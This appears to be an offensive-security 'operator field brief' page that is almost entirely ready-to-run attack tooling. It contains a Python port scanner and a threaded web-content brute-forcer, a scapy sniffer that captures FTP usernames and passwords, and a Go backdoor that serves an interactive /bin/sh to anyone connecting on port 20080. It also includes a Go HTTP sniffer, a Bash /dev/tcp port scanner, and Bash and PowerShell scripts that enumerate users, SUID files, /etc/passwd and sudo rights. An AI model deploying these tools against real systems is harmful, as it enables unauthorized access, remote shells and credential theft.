Exploit // Build and Adapt

Quick Reference

Quick Reference is presented here as an operator-facing field brief. It focuses on why the topic matters during real offensive work, where it changes decision-making, and which public references are worth keeping close while validating or reporting it.

field briefoperator referencecurated public sources

Why this topic matters

Quick Reference matters because it changes how an operator frames the problem, chooses validation steps and decides what evidence is strong enough to keep. In real work, weak handling of this topic leads to wasted time, noisy testing and softer findings.

This brief treats quick reference as a reusable field reference. The focus is on attack surface, decision points, practical workflow and the public material that is worth keeping nearby when you need to execute, verify or explain the subject under pressure.

Core coverage

The points below capture the main workflows, concepts, tools and operator decisions associated with quick reference.

  • Python portscanner
  • Python content bruter
  • Python netcat ersatz
  • Python ftp sniffer
  • Go portscanner
  • Go netcat backdoor
  • Go http sniffer
  • Bash automatisierung
  • Bash portscanner
  • Bash privilege escalation

Commands and snippets

import pyfiglet 
import sys 
import socket 
from datetime import datetime
from termcolor import colored

port_map = {
        21: "FTP",
        22: "SSH",
        25: "SMTP",
        80: "HTTP",
        110: "POP3",
        143: "IMAP",
        443: "HTTPS"
        }
   
ascii_banner = pyfiglet.figlet_format("PORT SCANNER") 
print(colored(ascii_banner, 'green')) 
   
in_target = input("TARGET:\t")      
target = socket.gethostbyname(in_target)  
  

print("-" * 50) 
print(colored(("Scanning Target: " + target), 'red', attrs=['reverse', 'blink'])) 
print("Scanning started at:" + str(datetime.now())) 
print("-" * 50) 
   
try: 
      
      for port in range(1,65535): 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        socket.setdefaulttimeout(1) 
          
      
        result = s.connect_ex((target,port)) 
        if result ==0: 
            if port in port_map:
                print(colored(("Port {}({}) is open".format(port, port_map[port])), 'green')) 
            else:
                print(colored(("Port {}(UNKNOWN) is open".format(port)), 'yellow')) 
        s.close() 
          
except KeyboardInterrupt: 
        print(colored("\n Exitting Program !!!!", 'red')) 
        sys.exit() 
except socket.gaierror: 
        print(colored("\n Hostname Could Not Be Resolved !!!!", 'red')) 
        sys.exit() 
except socket.error: 
        print(colored("\ Server not responding !!!!", 'red')) 
        sys.exit()
import queue
import threading
import urllib.error
import urllib.parse
import urllib.request
import pyfiglet
from termcolor import colored


threads = 50
target_url = "http://testphp.vulnweb.com"
wordlist_file = "all.txt"  # from SVNDigger
resume = None
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) " \
             "Gecko/20100101 " \
             "Firefox/19.0"

ascii_banner = pyfiglet.figlet_format("CONTENT BRUTE")
print(colored(ascii_banner, 'yellow'))


def build_wordlist(wordlst_file):
    fd = open(wordlst_file, "r")
    raw_words = [line.rstrip('\n') for line in fd]
    fd.close()

    found_resume = False
    words = queue.Queue()

    for word in raw_words:
        if resume:
            if found_resume:
                words.put(word)
            else:
                if word == resume:
                    found_resume = True
                    print("Resuming wordlist from: %s" % resume)
        else:
            words.put(word)
    return words


def dir_bruter(extensions=None):
    while not word_queue.empty():
        attempt = word_queue.get()
        attempt_list = []

        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt, extension))

         
        for brute in attempt_list:
            url = "%s%s" % (target_url, urllib.parse.quote(brute))
            try:
                headers = {"User-Agent": user_agent}
                r = urllib.request.Request(url, headers=headers)
                response = urllib.request.urlopen(r)
                if len(response.read()):
                    print(colored(("[%d] => %s" % (response.code, url)),'green'))
            except urllib.error.HTTPError as e:
                if e.code != 404:
                    print("!!! %d => %s" % (e.code, url))
                pass


word_queue = build_wordlist(wordlist_file)
file_extensions = [".php", ".bak", ".orig", ".inc"]

for i in range(threads):
    t = threading.Thread(target=dir_bruter, args=(file_extensions,))
    t.start()
#!/usr/bin/python3
import optparse
from scapy.all import *
import re


def ftp(packet):
    dest = packet.getlayer(IP).dst
    raw = packet.sprintf('%Raw.load%')
    user = re.findall('(?i)USER (.*)', raw)
    pswd = re.findall('(?i)PASS (.*)', raw)

    if user:
        print("[!] Detected FTP Login %s: " % str(dest))
        print("[+] User: %s" % str(user[0]))
    elif pswd:
        print("[+] Password: %s" % str(pswd[0]))


if __name__ == "__main__":
    parser = optparse.OptionParser('Usage: -i <interface>')
    parser.add_option('-i', dest='interface', type='string', help='specify the NIC interface to listen on')
    (options, args) = parser.parse_args()

    if options.interface  == None:
        print(parser.usage)
        exit(0)
    else:
        conf.iface = options.interface

    try:
        sniff(filter='tcp port 21', prn=ftp)

    except KeyboardInterrupt as e:
        print("[-] Closing function")
        exit(0)
package main

import (
	"io"
	"log"
	"net"
	"os/exec"
)

func handle(conn net.Conn) {

	/*
	 * Explicitly calling /bin/sh and using -i for interactive mode
	 * so that we can use it for stdin and stdout.
	 * For Windows use exec.Command("cmd.exe")
	 */
	// cmd := exec.Command("cmd.exe")
	cmd := exec.Command("/bin/sh", "-i")
	rp, wp := io.Pipe()
	// Set stdin to our connection
	cmd.Stdin = conn
	cmd.Stdout = wp
	go io.Copy(conn, rp)
	cmd.Run()
	conn.Close()
}

func main() {
	listener, err := net.Listen("tcp", ":20080")
	if err != nil {
		log.Fatalln(err)
	}

	for {
		conn, err := listener.Accept()
		if err != nil {
			log.Fatalln(err)
		}
		go handle(conn)
	}
}
package main

import (
	"fmt"
	"log"

	"github.com/google/gopacket"
	"github.com/google/gopacket/pcap"
)

var (
	iface    = "eth0"
	snaplen  = int32(1600)
	promisc  = false
	timeout  = pcap.BlockForever
	filter   = "tcp and port 80"
	devFound = false
)

func main() {
	devices, err := pcap.FindAllDevs()
	if err != nil {
		log.Panicln(err)
	}

	for _, device := range devices {
		if device.Name == iface {
			devFound = true
		}
	}
	if !devFound {
		log.Panicf("Device named '%s' does not exist\n", iface)
	}

	handle, err := pcap.OpenLive(iface, snaplen, promisc, timeout)
	if err != nil {
		log.Panicln(err)
	}
	defer handle.Close()

	if err := handle.SetBPFFilter(filter); err != nil {
		log.Panicln(err)
	}

	source := gopacket.NewPacketSource(handle, handle.LinkType())
	for packet := range source.Packets() {
		fmt.Println(packet)
	}
}
#!/bin/bash
empty=""

while [ "$1" != "" ]; do
	case "$1" in
		-i | --ip )		ip="$2";	shift;;
		-p | --ports )		ports="$2";	shift;;
	esac
	shift
done

if [[ $ip == $empty ]]; then
	echo "Please specify an IP address with -i"
	exit
fi

if [[ $ports == $empty ]]; then
	echo "Please specify the max port range -p"
	exit
fi

echo "Scanning: $ip"

for i in $(seq 1 $ports); do
	( echo > /dev/tcp/$ip/$i) > /dev/null 2>&1 && echo $ip":"$i "is open";
done
#! /bin/bash
user=$(whoami)
echo "USER: $user"
echo "SUID set"
echo $(find . -perm /4000)
echo "SGID set"
echo $(find . -perm /2000)
echo "/etc/passwd"
echo $(cat /etc/passwd)
echo "IP Config"
echo $(ip addr)
echo "SUDO"
echo $(sudo -l)
Write-Host -ForegroundColor Green "Enumeration Script"
Write-Host -ForegroundColor Red "Users:"
Get-LocalUser | Select *
Write-Host -ForegroundColor Yellow "Network Interfaces"
netsh interface ipv4 show interfaces
Write-Host -ForegroundColor Magenta "Network Adapter Infos"
Get-NetAdapter
Write-Host -ForegroundColor Cyan "Permissions to C:"
Get-Acl C:\

Curated public references